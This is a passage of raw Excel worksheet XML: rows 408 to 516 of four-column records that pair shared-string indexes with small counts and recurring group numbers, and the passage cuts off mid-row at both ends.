      </c>
    </row>
    <row r="408" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A408" t="s">
        <v>16229</v>
      </c>
      <c r="B408" t="s">
        <v>16221</v>
      </c>
      <c r="C408">
        <v>20</v>
      </c>
      <c r="D408">
        <v>510</v>
      </c>
    </row>
    <row r="409" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A409" t="s">
        <v>16230</v>
      </c>
      <c r="B409" t="s">
        <v>16222</v>
      </c>
      <c r="C409">
        <v>12</v>
      </c>
      <c r="D409">
        <v>510</v>
      </c>
    </row>
    <row r="410" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A410" t="s">
        <v>16223</v>
      </c>
      <c r="B410" t="s">
        <v>16223</v>
      </c>
      <c r="C410">
        <v>20</v>
      </c>
      <c r="D410">
        <v>510</v>
      </c>
    </row>
    <row r="411" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A411" t="s">
        <v>16224</v>
      </c>
      <c r="B411" t="s">
        <v>16224</v>
      </c>
      <c r="C411">
        <v>0</v>
      </c>
      <c r="D411">
        <v>510</v>
      </c>
    </row>
    <row r="412" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A412" t="s">
        <v>16228</v>
      </c>
      <c r="B412" t="s">
        <v>16211</v>
      </c>
      <c r="C412">
        <v>2</v>
      </c>
      <c r="D412">
        <v>2522</v>
      </c>
    </row>
    <row r="413" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A413" t="s">
        <v>16231</v>
      </c>
      <c r="B413" t="s">
        <v>16212</v>
      </c>
      <c r="C413">
        <v>0</v>
      </c>
      <c r="D413">
        <v>2522</v>
      </c>
    </row>
    <row r="414" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A414" t="s">
        <v>16228</v>
      </c>
      <c r="B414" t="s">
        <v>16213</v>
      </c>
      <c r="C414">
        <v>0</v>
      </c>
      <c r="D414">
        <v>2522</v>
      </c>
    </row>
    <row r="415" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A415" t="s">
        <v>16231</v>
      </c>
      <c r="B415" t="s">
        <v>16214</v>
      </c>
      <c r="C415">
        <v>0</v>
      </c>
      <c r="D415">
        <v>2522</v>
      </c>
    </row>
    <row r="416" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A416" t="s">
        <v>16228</v>
      </c>
      <c r="B416" t="s">
        <v>16215</v>
      </c>
      <c r="C416">
        <v>20</v>
      </c>
      <c r="D416">
        <v>2522</v>
      </c>
    </row>
    <row r="417" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A417" t="s">
        <v>16231</v>
      </c>
      <c r="B417" t="s">
        <v>16216</v>
      </c>
      <c r="C417">
        <v>0</v>
      </c>
      <c r="D417">
        <v>2522</v>
      </c>
    </row>
    <row r="418" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A418" t="s">
        <v>16228</v>
      </c>
      <c r="B418" t="s">
        <v>16217</v>
      </c>
      <c r="C418">
        <v>10</v>
      </c>
      <c r="D418">
        <v>2522</v>
      </c>
    </row>
    <row r="419" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A419" t="s">
        <v>16231</v>
      </c>
      <c r="B419" t="s">
        <v>16218</v>
      </c>
      <c r="C419">
        <v>0</v>
      </c>
      <c r="D419">
        <v>2522</v>
      </c>
    </row>
    <row r="420" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A420" t="s">
        <v>16229</v>
      </c>
      <c r="B420" t="s">
        <v>16219</v>
      </c>
      <c r="C420">
        <v>2</v>
      </c>
      <c r="D420">
        <v>2522</v>
      </c>
    </row>
    <row r="421" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A421" t="s">
        <v>16230</v>
      </c>
      <c r="B421" t="s">
        <v>16220</v>
      </c>
      <c r="C421">
        <v>2</v>
      </c>
      <c r="D421">
        <v>2522</v>
      </c>
    </row>
    <row r="422" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A422" t="s">
        <v>16229</v>
      </c>
      <c r="B422" t="s">
        <v>16221</v>
      </c>
      <c r="C422">
        <v>16</v>
      </c>
      <c r="D422">
        <v>2522</v>
      </c>
    </row>
    <row r="423" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A423" t="s">
        <v>16230</v>
      </c>
      <c r="B423" t="s">
        <v>16222</v>
      </c>
      <c r="C423">
        <v>30</v>
      </c>
      <c r="D423">
        <v>2522</v>
      </c>
    </row>
    <row r="424" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A424" t="s">
        <v>16223</v>
      </c>
      <c r="B424" t="s">
        <v>16223</v>
      </c>
      <c r="C424">
        <v>24</v>
      </c>
      <c r="D424">
        <v>2522</v>
      </c>
    </row>
    <row r="425" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A425" t="s">
        <v>16224</v>
      </c>
      <c r="B425" t="s">
        <v>16224</v>
      </c>
      <c r="C425">
        <v>1</v>
      </c>
      <c r="D425">
        <v>2522</v>
      </c>
    </row>
    <row r="426" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A426" t="s">
        <v>16228</v>
      </c>
      <c r="B426" t="s">
        <v>16211</v>
      </c>
      <c r="C426">
        <v>0</v>
      </c>
      <c r="D426">
        <v>943</v>
      </c>
    </row>
    <row r="427" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A427" t="s">
        <v>16231</v>
      </c>
      <c r="B427" t="s">
        <v>16212</v>
      </c>
      <c r="C427">
        <v>3</v>
      </c>
      <c r="D427">
        <v>943</v>
      </c>
    </row>
    <row r="428" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A428" t="s">
        <v>16228</v>
      </c>
      <c r="B428" t="s">
        <v>16213</v>
      </c>
      <c r="C428">
        <v>5</v>
      </c>
      <c r="D428">
        <v>943</v>
      </c>
    </row>
    <row r="429" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A429" t="s">
        <v>16231</v>
      </c>
      <c r="B429" t="s">
        <v>16214</v>
      </c>
      <c r="C429">
        <v>7</v>
      </c>
      <c r="D429">
        <v>943</v>
      </c>
    </row>
    <row r="430" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A430" t="s">
        <v>16228</v>
      </c>
      <c r="B430" t="s">
        <v>16215</v>
      </c>
      <c r="C430">
        <v>0</v>
      </c>
      <c r="D430">
        <v>943</v>
      </c>
    </row>
    <row r="431" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A431" t="s">
        <v>16231</v>
      </c>
      <c r="B431" t="s">
        <v>16216</v>
      </c>
      <c r="C431">
        <v>3</v>
      </c>
      <c r="D431">
        <v>943</v>
      </c>
    </row>
    <row r="432" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A432" t="s">
        <v>16228</v>
      </c>
      <c r="B432" t="s">
        <v>16217</v>
      </c>
      <c r="C432">
        <v>5</v>
      </c>
      <c r="D432">
        <v>943</v>
      </c>
    </row>
    <row r="433" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A433" t="s">
        <v>16231</v>
      </c>
      <c r="B433" t="s">
        <v>16218</v>
      </c>
      <c r="C433">
        <v>7</v>
      </c>
      <c r="D433">
        <v>943</v>
      </c>
    </row>
    <row r="434" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A434" t="s">
        <v>16229</v>
      </c>
      <c r="B434" t="s">
        <v>16219</v>
      </c>
      <c r="C434">
        <v>0</v>
      </c>
      <c r="D434">
        <v>943</v>
      </c>
    </row>
    <row r="435" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A435" t="s">
        <v>16230</v>
      </c>
      <c r="B435" t="s">
        <v>16220</v>
      </c>
      <c r="C435">
        <v>0</v>
      </c>
      <c r="D435">
        <v>943</v>
      </c>
    </row>
    <row r="436" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A436" t="s">
        <v>16229</v>
      </c>
      <c r="B436" t="s">
        <v>16221</v>
      </c>
      <c r="C436">
        <v>7</v>
      </c>
      <c r="D436">
        <v>943</v>
      </c>
    </row>
    <row r="437" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A437" t="s">
        <v>16230</v>
      </c>
      <c r="B437" t="s">
        <v>16222</v>
      </c>
      <c r="C437">
        <v>5</v>
      </c>
      <c r="D437">
        <v>943</v>
      </c>
    </row>
    <row r="438" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A438" t="s">
        <v>16223</v>
      </c>
      <c r="B438" t="s">
        <v>16223</v>
      </c>
      <c r="C438">
        <v>30</v>
      </c>
      <c r="D438">
        <v>943</v>
      </c>
    </row>
    <row r="439" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A439" t="s">
        <v>16224</v>
      </c>
      <c r="B439" t="s">
        <v>16224</v>
      </c>
      <c r="C439">
        <v>1</v>
      </c>
      <c r="D439">
        <v>943</v>
      </c>
    </row>
    <row r="440" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A440" t="s">
        <v>16228</v>
      </c>
      <c r="B440" t="s">
        <v>16211</v>
      </c>
      <c r="C440">
        <v>0</v>
      </c>
      <c r="D440">
        <v>1149</v>
      </c>
    </row>
    <row r="441" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A441" t="s">
        <v>16231</v>
      </c>
      <c r="B441" t="s">
        <v>16212</v>
      </c>
      <c r="C441">
        <v>0</v>
      </c>
      <c r="D441">
        <v>1149</v>
      </c>
    </row>
    <row r="442" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A442" t="s">
        <v>16228</v>
      </c>
      <c r="B442" t="s">
        <v>16213</v>
      </c>
      <c r="C442">
        <v>0</v>
      </c>
      <c r="D442">
        <v>1149</v>
      </c>
    </row>
    <row r="443" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A443" t="s">
        <v>16231</v>
      </c>
      <c r="B443" t="s">
        <v>16214</v>
      </c>
      <c r="C443">
        <v>0</v>
      </c>
      <c r="D443">
        <v>1149</v>
      </c>
    </row>
    <row r="444" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A444" t="s">
        <v>16228</v>
      </c>
      <c r="B444" t="s">
        <v>16215</v>
      </c>
      <c r="C444">
        <v>5</v>
      </c>
      <c r="D444">
        <v>1149</v>
      </c>
    </row>
    <row r="445" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A445" t="s">
        <v>16231</v>
      </c>
      <c r="B445" t="s">
        <v>16216</v>
      </c>
      <c r="C445">
        <v>28</v>
      </c>
      <c r="D445">
        <v>1149</v>
      </c>
    </row>
    <row r="446" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A446" t="s">
        <v>16228</v>
      </c>
      <c r="B446" t="s">
        <v>16217</v>
      </c>
      <c r="C446">
        <v>120</v>
      </c>
      <c r="D446">
        <v>1149</v>
      </c>
    </row>
    <row r="447" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A447" t="s">
        <v>16231</v>
      </c>
      <c r="B447" t="s">
        <v>16218</v>
      </c>
      <c r="C447">
        <v>39</v>
      </c>
      <c r="D447">
        <v>1149</v>
      </c>
    </row>
    <row r="448" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A448" t="s">
        <v>16229</v>
      </c>
      <c r="B448" t="s">
        <v>16219</v>
      </c>
      <c r="C448">
        <v>0</v>
      </c>
      <c r="D448">
        <v>1149</v>
      </c>
    </row>
    <row r="449" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A449" t="s">
        <v>16230</v>
      </c>
      <c r="B449" t="s">
        <v>16220</v>
      </c>
      <c r="C449">
        <v>0</v>
      </c>
      <c r="D449">
        <v>1149</v>
      </c>
    </row>
    <row r="450" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A450" t="s">
        <v>16229</v>
      </c>
      <c r="B450" t="s">
        <v>16221</v>
      </c>
      <c r="C450">
        <v>0</v>
      </c>
      <c r="D450">
        <v>1149</v>
      </c>
    </row>
    <row r="451" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A451" t="s">
        <v>16230</v>
      </c>
      <c r="B451" t="s">
        <v>16222</v>
      </c>
      <c r="C451">
        <v>0</v>
      </c>
      <c r="D451">
        <v>1149</v>
      </c>
    </row>
    <row r="452" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A452" t="s">
        <v>16223</v>
      </c>
      <c r="B452" t="s">
        <v>16223</v>
      </c>
      <c r="C452">
        <v>25</v>
      </c>
      <c r="D452">
        <v>1149</v>
      </c>
    </row>
    <row r="453" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A453" t="s">
        <v>16224</v>
      </c>
      <c r="B453" t="s">
        <v>16224</v>
      </c>
      <c r="C453">
        <v>0</v>
      </c>
      <c r="D453">
        <v>1149</v>
      </c>
    </row>
    <row r="454" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A454" t="s">
        <v>16228</v>
      </c>
      <c r="B454" t="s">
        <v>16211</v>
      </c>
      <c r="C454">
        <v>0</v>
      </c>
      <c r="D454">
        <v>2126</v>
      </c>
    </row>
    <row r="455" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A455" t="s">
        <v>16231</v>
      </c>
      <c r="B455" t="s">
        <v>16212</v>
      </c>
      <c r="C455">
        <v>0</v>
      </c>
      <c r="D455">
        <v>2126</v>
      </c>
    </row>
    <row r="456" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A456" t="s">
        <v>16228</v>
      </c>
      <c r="B456" t="s">
        <v>16213</v>
      </c>
      <c r="C456">
        <v>0</v>
      </c>
      <c r="D456">
        <v>2126</v>
      </c>
    </row>
    <row r="457" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A457" t="s">
        <v>16231</v>
      </c>
      <c r="B457" t="s">
        <v>16214</v>
      </c>
      <c r="C457">
        <v>0</v>
      </c>
      <c r="D457">
        <v>2126</v>
      </c>
    </row>
    <row r="458" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A458" t="s">
        <v>16228</v>
      </c>
      <c r="B458" t="s">
        <v>16215</v>
      </c>
      <c r="C458">
        <v>1</v>
      </c>
      <c r="D458">
        <v>2126</v>
      </c>
    </row>
    <row r="459" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A459" t="s">
        <v>16231</v>
      </c>
      <c r="B459" t="s">
        <v>16216</v>
      </c>
      <c r="C459">
        <v>0</v>
      </c>
      <c r="D459">
        <v>2126</v>
      </c>
    </row>
    <row r="460" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A460" t="s">
        <v>16228</v>
      </c>
      <c r="B460" t="s">
        <v>16217</v>
      </c>
      <c r="C460">
        <v>5</v>
      </c>
      <c r="D460">
        <v>2126</v>
      </c>
    </row>
    <row r="461" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A461" t="s">
        <v>16231</v>
      </c>
      <c r="B461" t="s">
        <v>16218</v>
      </c>
      <c r="C461">
        <v>1</v>
      </c>
      <c r="D461">
        <v>2126</v>
      </c>
    </row>
    <row r="462" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A462" t="s">
        <v>16229</v>
      </c>
      <c r="B462" t="s">
        <v>16219</v>
      </c>
      <c r="C462">
        <v>0</v>
      </c>
      <c r="D462">
        <v>2126</v>
      </c>
    </row>
    <row r="463" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A463" t="s">
        <v>16230</v>
      </c>
      <c r="B463" t="s">
        <v>16220</v>
      </c>
      <c r="C463">
        <v>0</v>
      </c>
      <c r="D463">
        <v>2126</v>
      </c>
    </row>
    <row r="464" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A464" t="s">
        <v>16229</v>
      </c>
      <c r="B464" t="s">
        <v>16221</v>
      </c>
      <c r="C464">
        <v>0</v>
      </c>
      <c r="D464">
        <v>2126</v>
      </c>
    </row>
    <row r="465" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A465" t="s">
        <v>16230</v>
      </c>
      <c r="B465" t="s">
        <v>16222</v>
      </c>
      <c r="C465">
        <v>0</v>
      </c>
      <c r="D465">
        <v>2126</v>
      </c>
    </row>
    <row r="466" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A466" t="s">
        <v>16223</v>
      </c>
      <c r="B466" t="s">
        <v>16223</v>
      </c>
      <c r="C466">
        <v>26</v>
      </c>
      <c r="D466">
        <v>2126</v>
      </c>
    </row>
    <row r="467" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A467" t="s">
        <v>16224</v>
      </c>
      <c r="B467" t="s">
        <v>16224</v>
      </c>
      <c r="C467">
        <v>1</v>
      </c>
      <c r="D467">
        <v>2126</v>
      </c>
    </row>
    <row r="468" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A468" t="s">
        <v>16231</v>
      </c>
      <c r="B468" t="s">
        <v>16216</v>
      </c>
      <c r="C468">
        <v>7</v>
      </c>
      <c r="D468">
        <v>306</v>
      </c>
    </row>
    <row r="469" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A469" t="s">
        <v>16228</v>
      </c>
      <c r="B469" t="s">
        <v>16217</v>
      </c>
      <c r="C469">
        <v>33</v>
      </c>
      <c r="D469">
        <v>306</v>
      </c>
    </row>
    <row r="470" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A470" t="s">
        <v>16231</v>
      </c>
      <c r="B470" t="s">
        <v>16218</v>
      </c>
      <c r="C470">
        <v>56</v>
      </c>
      <c r="D470">
        <v>306</v>
      </c>
    </row>
    <row r="471" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A471" t="s">
        <v>16229</v>
      </c>
      <c r="B471" t="s">
        <v>16221</v>
      </c>
      <c r="C471">
        <v>18</v>
      </c>
      <c r="D471">
        <v>306</v>
      </c>
    </row>
    <row r="472" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A472" t="s">
        <v>16230</v>
      </c>
      <c r="B472" t="s">
        <v>16222</v>
      </c>
      <c r="C472">
        <v>151</v>
      </c>
      <c r="D472">
        <v>306</v>
      </c>
    </row>
    <row r="473" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A473" t="s">
        <v>16228</v>
      </c>
      <c r="B473" t="s">
        <v>16211</v>
      </c>
      <c r="C473">
        <v>0</v>
      </c>
      <c r="D473">
        <v>572</v>
      </c>
    </row>
    <row r="474" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A474" t="s">
        <v>16231</v>
      </c>
      <c r="B474" t="s">
        <v>16212</v>
      </c>
      <c r="C474">
        <v>0</v>
      </c>
      <c r="D474">
        <v>572</v>
      </c>
    </row>
    <row r="475" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A475" t="s">
        <v>16228</v>
      </c>
      <c r="B475" t="s">
        <v>16213</v>
      </c>
      <c r="C475">
        <v>1</v>
      </c>
      <c r="D475">
        <v>572</v>
      </c>
    </row>
    <row r="476" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A476" t="s">
        <v>16231</v>
      </c>
      <c r="B476" t="s">
        <v>16214</v>
      </c>
      <c r="C476">
        <v>0</v>
      </c>
      <c r="D476">
        <v>572</v>
      </c>
    </row>
    <row r="477" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A477" t="s">
        <v>16228</v>
      </c>
      <c r="B477" t="s">
        <v>16215</v>
      </c>
      <c r="C477">
        <v>3</v>
      </c>
      <c r="D477">
        <v>572</v>
      </c>
    </row>
    <row r="478" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A478" t="s">
        <v>16231</v>
      </c>
      <c r="B478" t="s">
        <v>16216</v>
      </c>
      <c r="C478">
        <v>0</v>
      </c>
      <c r="D478">
        <v>572</v>
      </c>
    </row>
    <row r="479" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A479" t="s">
        <v>16228</v>
      </c>
      <c r="B479" t="s">
        <v>16217</v>
      </c>
      <c r="C479">
        <v>0</v>
      </c>
      <c r="D479">
        <v>572</v>
      </c>
    </row>
    <row r="480" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A480" t="s">
        <v>16231</v>
      </c>
      <c r="B480" t="s">
        <v>16218</v>
      </c>
      <c r="C480">
        <v>0</v>
      </c>
      <c r="D480">
        <v>572</v>
      </c>
    </row>
    <row r="481" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A481" t="s">
        <v>16229</v>
      </c>
      <c r="B481" t="s">
        <v>16219</v>
      </c>
      <c r="C481">
        <v>5</v>
      </c>
      <c r="D481">
        <v>572</v>
      </c>
    </row>
    <row r="482" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A482" t="s">
        <v>16230</v>
      </c>
      <c r="B482" t="s">
        <v>16220</v>
      </c>
      <c r="C482">
        <v>0</v>
      </c>
      <c r="D482">
        <v>572</v>
      </c>
    </row>
    <row r="483" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A483" t="s">
        <v>16229</v>
      </c>
      <c r="B483" t="s">
        <v>16221</v>
      </c>
      <c r="C483">
        <v>0</v>
      </c>
      <c r="D483">
        <v>572</v>
      </c>
    </row>
    <row r="484" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A484" t="s">
        <v>16230</v>
      </c>
      <c r="B484" t="s">
        <v>16222</v>
      </c>
      <c r="C484">
        <v>0</v>
      </c>
      <c r="D484">
        <v>572</v>
      </c>
    </row>
    <row r="485" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A485" t="s">
        <v>16223</v>
      </c>
      <c r="B485" t="s">
        <v>16223</v>
      </c>
      <c r="C485">
        <v>27</v>
      </c>
      <c r="D485">
        <v>572</v>
      </c>
    </row>
    <row r="486" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A486" t="s">
        <v>16224</v>
      </c>
      <c r="B486" t="s">
        <v>16224</v>
      </c>
      <c r="C486">
        <v>0</v>
      </c>
      <c r="D486">
        <v>572</v>
      </c>
    </row>
    <row r="487" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A487" t="s">
        <v>16228</v>
      </c>
      <c r="B487" t="s">
        <v>16211</v>
      </c>
      <c r="C487">
        <v>0</v>
      </c>
      <c r="D487">
        <v>1238</v>
      </c>
    </row>
    <row r="488" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A488" t="s">
        <v>16231</v>
      </c>
      <c r="B488" t="s">
        <v>16212</v>
      </c>
      <c r="C488">
        <v>0</v>
      </c>
      <c r="D488">
        <v>1238</v>
      </c>
    </row>
    <row r="489" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A489" t="s">
        <v>16228</v>
      </c>
      <c r="B489" t="s">
        <v>16213</v>
      </c>
      <c r="C489">
        <v>0</v>
      </c>
      <c r="D489">
        <v>1238</v>
      </c>
    </row>
    <row r="490" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A490" t="s">
        <v>16231</v>
      </c>
      <c r="B490" t="s">
        <v>16214</v>
      </c>
      <c r="C490">
        <v>0</v>
      </c>
      <c r="D490">
        <v>1238</v>
      </c>
    </row>
    <row r="491" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A491" t="s">
        <v>16228</v>
      </c>
      <c r="B491" t="s">
        <v>16215</v>
      </c>
      <c r="C491">
        <v>3</v>
      </c>
      <c r="D491">
        <v>1238</v>
      </c>
    </row>
    <row r="492" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A492" t="s">
        <v>16231</v>
      </c>
      <c r="B492" t="s">
        <v>16216</v>
      </c>
      <c r="C492">
        <v>4</v>
      </c>
      <c r="D492">
        <v>1238</v>
      </c>
    </row>
    <row r="493" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A493" t="s">
        <v>16228</v>
      </c>
      <c r="B493" t="s">
        <v>16217</v>
      </c>
      <c r="C493">
        <v>15</v>
      </c>
      <c r="D493">
        <v>1238</v>
      </c>
    </row>
    <row r="494" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A494" t="s">
        <v>16231</v>
      </c>
      <c r="B494" t="s">
        <v>16218</v>
      </c>
      <c r="C494">
        <v>5</v>
      </c>
      <c r="D494">
        <v>1238</v>
      </c>
    </row>
    <row r="495" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A495" t="s">
        <v>16229</v>
      </c>
      <c r="B495" t="s">
        <v>16219</v>
      </c>
      <c r="C495">
        <v>0</v>
      </c>
      <c r="D495">
        <v>1238</v>
      </c>
    </row>
    <row r="496" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A496" t="s">
        <v>16230</v>
      </c>
      <c r="B496" t="s">
        <v>16220</v>
      </c>
      <c r="C496">
        <v>4</v>
      </c>
      <c r="D496">
        <v>1238</v>
      </c>
    </row>
    <row r="497" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A497" t="s">
        <v>16229</v>
      </c>
      <c r="B497" t="s">
        <v>16221</v>
      </c>
      <c r="C497">
        <v>141</v>
      </c>
      <c r="D497">
        <v>1238</v>
      </c>
    </row>
    <row r="498" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A498" t="s">
        <v>16230</v>
      </c>
      <c r="B498" t="s">
        <v>16222</v>
      </c>
      <c r="C498">
        <v>104</v>
      </c>
      <c r="D498">
        <v>1238</v>
      </c>
    </row>
    <row r="499" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A499" t="s">
        <v>16223</v>
      </c>
      <c r="B499" t="s">
        <v>16223</v>
      </c>
      <c r="C499">
        <v>24</v>
      </c>
      <c r="D499">
        <v>1238</v>
      </c>
    </row>
    <row r="500" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A500" t="s">
        <v>16224</v>
      </c>
      <c r="B500" t="s">
        <v>16224</v>
      </c>
      <c r="C500">
        <v>3</v>
      </c>
      <c r="D500">
        <v>1238</v>
      </c>
    </row>
    <row r="501" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A501" t="s">
        <v>16228</v>
      </c>
      <c r="B501" t="s">
        <v>16211</v>
      </c>
      <c r="C501">
        <v>0</v>
      </c>
      <c r="D501">
        <v>423</v>
      </c>
    </row>
    <row r="502" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A502" t="s">
        <v>16231</v>
      </c>
      <c r="B502" t="s">
        <v>16212</v>
      </c>
      <c r="C502">
        <v>0</v>
      </c>
      <c r="D502">
        <v>423</v>
      </c>
    </row>
    <row r="503" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A503" t="s">
        <v>16228</v>
      </c>
      <c r="B503" t="s">
        <v>16213</v>
      </c>
      <c r="C503">
        <v>9</v>
      </c>
      <c r="D503">
        <v>423</v>
      </c>
    </row>
    <row r="504" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A504" t="s">
        <v>16231</v>
      </c>
      <c r="B504" t="s">
        <v>16214</v>
      </c>
      <c r="C504">
        <v>0</v>
      </c>
      <c r="D504">
        <v>423</v>
      </c>
    </row>
    <row r="505" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A505" t="s">
        <v>16228</v>
      </c>
      <c r="B505" t="s">
        <v>16215</v>
      </c>
      <c r="C505">
        <v>0</v>
      </c>
      <c r="D505">
        <v>423</v>
      </c>
    </row>
    <row r="506" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A506" t="s">
        <v>16231</v>
      </c>
      <c r="B506" t="s">
        <v>16216</v>
      </c>
      <c r="C506">
        <v>0</v>
      </c>
      <c r="D506">
        <v>423</v>
      </c>
    </row>
    <row r="507" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A507" t="s">
        <v>16228</v>
      </c>
      <c r="B507" t="s">
        <v>16217</v>
      </c>
      <c r="C507">
        <v>0</v>
      </c>
      <c r="D507">
        <v>423</v>
      </c>
    </row>
    <row r="508" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A508" t="s">
        <v>16231</v>
      </c>
      <c r="B508" t="s">
        <v>16218</v>
      </c>
      <c r="C508">
        <v>0</v>
      </c>
      <c r="D508">
        <v>423</v>
      </c>
    </row>
    <row r="509" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A509" t="s">
        <v>16229</v>
      </c>
      <c r="B509" t="s">
        <v>16219</v>
      </c>
      <c r="C509">
        <v>0</v>
      </c>
      <c r="D509">
        <v>423</v>
      </c>
    </row>
    <row r="510" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A510" t="s">
        <v>16230</v>
      </c>
      <c r="B510" t="s">
        <v>16220</v>
      </c>
      <c r="C510">
        <v>0</v>
      </c>
      <c r="D510">
        <v>423</v>
      </c>
    </row>
    <row r="511" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A511" t="s">
        <v>16229</v>
      </c>
      <c r="B511" t="s">
        <v>16221</v>
      </c>
      <c r="C511">
        <v>0</v>
      </c>
      <c r="D511">
        <v>423</v>
      </c>
    </row>
    <row r="512" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A512" t="s">
        <v>16230</v>
      </c>
      <c r="B512" t="s">
        <v>16222</v>
      </c>
      <c r="C512">
        <v>0</v>
      </c>
      <c r="D512">
        <v>423</v>
      </c>
    </row>
    <row r="513" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A513" t="s">
        <v>16223</v>
      </c>
      <c r="B513" t="s">
        <v>16223</v>
      </c>
      <c r="C513">
        <v>24</v>
      </c>
      <c r="D513">
        <v>423</v>
      </c>
    </row>
    <row r="514" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A514" t="s">
        <v>16224</v>
      </c>
      <c r="B514" t="s">
        <v>16224</v>
      </c>
      <c r="C514">
        <v>0</v>
      </c>
      <c r="D514">
        <v>423</v>
      </c>
    </row>
    <row r="515" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A515" t="s">
        <v>16228</v>
      </c>
      <c r="B515" t="s">
        <v>16211</v>
      </c>
      <c r="C515">
        <v>0</v>
      </c>
      <c r="D515">
        <v>1503</v>
      </c>
    </row>
    <row r="516" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A516" t="s">
        <v>16231</v>
      </c>
      <c r="B516" t="s">
        <v>16212</v>
      </c>
      <c r="C516">
        <v>1</v>
      </c>
      <c r="D516">
        <v>1503</v>
      </c>
